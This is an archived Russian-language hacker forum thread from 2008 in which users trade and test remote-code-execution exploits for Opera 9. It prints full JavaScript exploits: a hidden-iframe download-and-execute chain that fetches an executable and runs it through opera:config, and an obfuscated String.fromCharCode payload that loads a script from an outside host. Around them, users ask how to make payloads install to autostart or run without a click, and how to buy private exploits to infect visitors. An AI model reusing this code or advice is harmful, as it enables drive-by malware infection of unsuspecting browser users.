Эксплойты для Opera [Архив]

Просмотр полной версии : Эксплойты для Opera

-=[AL!EN]=-

06.01.2008, 20:34

Прошлую тему удалили модеры (не в том разделе видимо создал)
Тут его уже выкладывали, но видимо старую тему с ним уже дельнули, ищу еще раз експлоит для оперы 9 версии (remote download & execution)

SVAROG

10.01.2008, 22:17

http://milw0rm.com/exploits/3871
http://milw0rm.com/exploits/3784
http://milw0rm.com/exploits/3101

-=[AL!EN]=-

10.01.2008, 22:25

Спасибо, но к сожалению не то... Насколько помню выкладывали remote dwnld & execution...

razzzar

10.01.2008, 22:32

Этот?

<script>
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe = document.createElement('iframe');\
config_iframe.setAttribute('id', 'config_iframe_window');\
config_iframe.src = 'opera:config';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('script');\
cache_iframe = document.createElement('iframe');\
app_iframe.src = 'http://path/to/exe';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'opera:cache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('href', 'tn3270://nothing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>

-=[AL!EN]=-

10.01.2008, 23:36

razzzar
это для 9й оперы? если да, то большое спс

razzzar

10.01.2008, 23:52

Да, для 9ой.

[ }/{еСтоКий MAN ]

19.01.2008, 18:33

хай. А как юзать этот эксплоит? можно пример?

mind

19.01.2008, 18:46

Вот здесь видимо прописать путь к exe файлу:

app_iframe.src = 'http://path/to/exe';\

Не проверял, девятой оперы нема ((
DrWeb запалил сплоит )))

.::Gh0st::.

19.01.2008, 18:59

залил на удаленный хост калькулятор, скачался. правда не запустился. проверял на опере 9.20

gibson

19.01.2008, 19:07

сплойт не рабочий его нужно переписать. рабочий в привате.

alexman90

19.01.2008, 19:20

вот .::Gh0st::. сказал что эксплоит скачал калькулятор но не запустил... а можно ли сделать так чтобы скачивалось в автозагрузку??

-=[AL!EN]=-

19.01.2008, 20:48

сплойт не рабочий его нужно переписать. рабочий в привате.
вот мля а я то думаю че то по траффу прогнал ничего не грузанулось :)

Mescalin

20.01.2008, 00:17

у меня этот сплоит норм работал месяца 2 назад тестил на себе опера 9.20 вроде грузил cmd все норм запускал,а потом бац не грузит хз вобщем из за чего это (((

heks

09.06.2008, 20:37

Тут такой вопрос есть сплоит под эту версию у кого можно его достать или купить и за сколько?

m9chik

09.06.2008, 20:40

с чего ты ваще взял что есть сплоит под оперу? и еси 9.27 то большенство юзеров обновляют и очень часто оперу. и сплоит под оперу...ваще впервые слышу :)

-=lebed=-

09.06.2008, 20:51

с чего ты ваще взял что есть сплоит под оперу? и еси 9.27 то большенство юзеров обновляют и очень часто оперу. и сплоит под оперу...ваще впервые слышу :)
Есть под более ранние версии...

heks

09.06.2008, 21:22

лазию с последней версией браузера у меня увели историю с квипа чел стукнул сам говорит в привате уже сплоит по эту версию есть попался я на ифрейме как он сказал сразу говорю что всякую дрянь я не открываю стоит аутпост который ничего не заподозрил sp3 тоже пробил да и еще нод с последними обновлениями

Piflit

09.06.2008, 21:47

ищи плоент в кэше :)

heks

09.06.2008, 21:59

ищи плоент в кэше :)
и как он выглядеть должен?

oRb

09.06.2008, 22:20

diehard

09.06.2008, 22:22

Дай ссылку на зараженную страницу - будет тебе сплойт

diehard

09.06.2008, 22:24

oRb
Это не пробивает мою 9.23

*DeViL*

10.06.2008, 22:06

oRb
Это не пробивает мою 9.23
глупо пробовать на себе, тем более 100% сплоитов не бывает) юзай трафик и будут тебе loads...

Nelzone

10.06.2008, 22:25

Opera <= 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities
Opera 9.10 alert() Remote Denial of Service Exploit
тока для древни версии...

diehard

16.06.2008, 01:52

глупо пробовать на себе, тем более 100% сплоитов не бывает) юзай трафик и будут тебе loads...

Ы? почему на себе глупо-то пробовать?
на моей связке этот сплоит рубил Оперы насколько помню только версий 9.00-9.20

Chaak

30.10.2008, 22:56

Remote code exec.


<html>
<script>
function x() {
window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111, 99,117,109,101,110,116,46,99,114,101,97,116,101,69 ,108,101,109,101,110,116,40,34,83,67,82,73,80,84,3 4,41,59,113,46,115,114,99,61,34,104,116,116,112,58 ,47,47,119,119,119,46,114,97,102,102,111,110,46,11 0,101,116,47,114,101,115,101,97,114,99,104,47,111, 112,101,114,97,47,104,105,115,116,111,114,121,47,1 11,46,106,115,34,59,100,111,99,117,109,101,110,116 ,46,98,111,100,121,46,97,112,112,101,110,100,67,10 4,105,108,100,40,113,41,59))\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="x()">Click me...</a>
 
 
 
 
 
 
 
 
 
 
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
 
 
 
 
 
 
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,9 9,117,109,101,110,116,46,99,114,101,97,116,101,69, 108,101,109,101,110,116,40,34,83,67,82,73,80,84,34 ,41,59,113,46,115,114,99,61,34,104,116,116,112,58, 47,47,119,119,119,46,114,97,102,102,111,110,46,110 ,101,116,47,114,101,115,101,97,114,99,104,47,111,1 12,101,114,97,47,104,105,115,116,111,114,121,47,11 1,46,106,115,34,59,100,111,99,117,109,101,110,116, 46,98,111,100,121,46,97,112,112,101,110,100,67,104 ,105,108,100,40,113,41,59))'>
</body>
</html>
Сохраняем, запускаем, откроется калькулятор =)
Работает на 9.61 и 9.62.

Видео: http://dump.ru/file/1168495

http://www.milw0rm.com/exploits/6880

GlOFF

30.10.2008, 23:11

На 9.62 уже что-то не прокатывает... или я что-то не так делаю! :)))
Жалко что перестановил версию 9.61!!! :)

n0153r

30.10.2008, 23:35

=) у мну не работает и на 9.61 .....

C.C.C.P

30.10.2008, 23:50

9.62 не работает.

mr.The

31.10.2008, 00:17

то-то я думаю опера мне обновиться предложила..

.acme

31.10.2008, 12:08

на 9.61 не сработала. (win32)

iddqd

31.10.2008, 12:11

аналогично

GlOFF

31.10.2008, 12:39

Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все :))

DVD_RW

31.10.2008, 12:43

у мну включается калькулятор .. ток надо нажать Click me... и там всякие ерроры и обратно и калькулятор :)

Dimi4

31.10.2008, 13:32

Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все )
Бгг єт не чак нашел багу) см копирайты)

satana8920

31.10.2008, 14:07

а как будет выглядеть сплойт еси надо че то подгрузить???и запустить
можт соберем побольше сплойтов для браузеров ;)

Sleep

02.11.2008, 18:13

OPERA 9.62 Remote Code Execution


<html>
<script>
function execcalc() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a> 
<script>
function execcalca() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a> 
<script>
function execcalcb() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a> 
<script>
function execcalcc() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a> 
<script>
function execcalcd() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a> 
</html>

Потестить на себе можно тут (http://milw0rm.com/exploit.php?id=6884)
скачать:тут (http://milw0rm.com/exploits/6884)
:)

[Dezzter]

02.11.2008, 18:19

что позволяет уязвимость сделать на уязвимой тачке???

_kREveDKo_

02.11.2008, 18:20

Выполнение произвольноо кода, разве не видно? В примере вызывается калькулятор.

astrologer

02.11.2008, 18:22

This presumed "exploit" just proves that "NeoCoderz" doesn't understand what the problem was, and trust me - his "exploit code" in fact makes no sense AT ALL. Seriously - he's trying to "inject" code that will simply eval() a string which is the path to calc.exe - as if that would automagically change Opera's preferences or make Opera throw that path at the system and execute it. Totally clueless. (He even claims his "exploit" is "injecting" this code into pages that do not accept any input - like opera:plugins and opera:about. Источник (http://my.opera.com/hallvors/blog/2008/10/31/unfortunately-opera-is-the-new-chrome#comment6314230).

ntldr

02.11.2008, 18:30

у меня только вызвался диалог "mailto"
Если что, билд=10467

Sleep

02.11.2008, 18:34

у тебя какая версия стоит ?
пробовал на 9,60 бета не идет
на 9,61 9,62 идёт

ntldr

02.11.2008, 23:23

9,62
скажи какой билд 9.62

satana8920

03.11.2008, 00:10

а как переделать что б не открывал хреф ссылку а просто что б открывал какой нито экзешник шелкод или еще что то???

iddqd

03.11.2008, 00:13

попробуй это
http://forum.antichat.ru/thread61124.html

satana8920

03.11.2008, 00:19

перезалей плизз metasploit shellcodes parser/converter

Sleep

03.11.2008, 00:22

_http://sleep2008sleep.narod.ru/metasploit_generator_exe.rar
наврятли он тебе поможет я так понял чтобы запустить например цмд за место калькулятора надо чтобы в
opera:config#Mail|ExternalApplication было прописано c:\windows\system32\cmd.exe но каким образом ето заставить прописать жертву для меня загадка
или через строку урл-запроса как нить
2ntldr
у меня 10467 всё идёт

iddqd

03.11.2008, 00:23

у меня вроде старая версия завалялась:
http://webfile.ru/2356826

satana8920

03.11.2008, 00:29

а как убрать тег <a href= что б ненадо было никуда нажимать а просто само выполнялось???

iddqd

03.11.2008, 00:40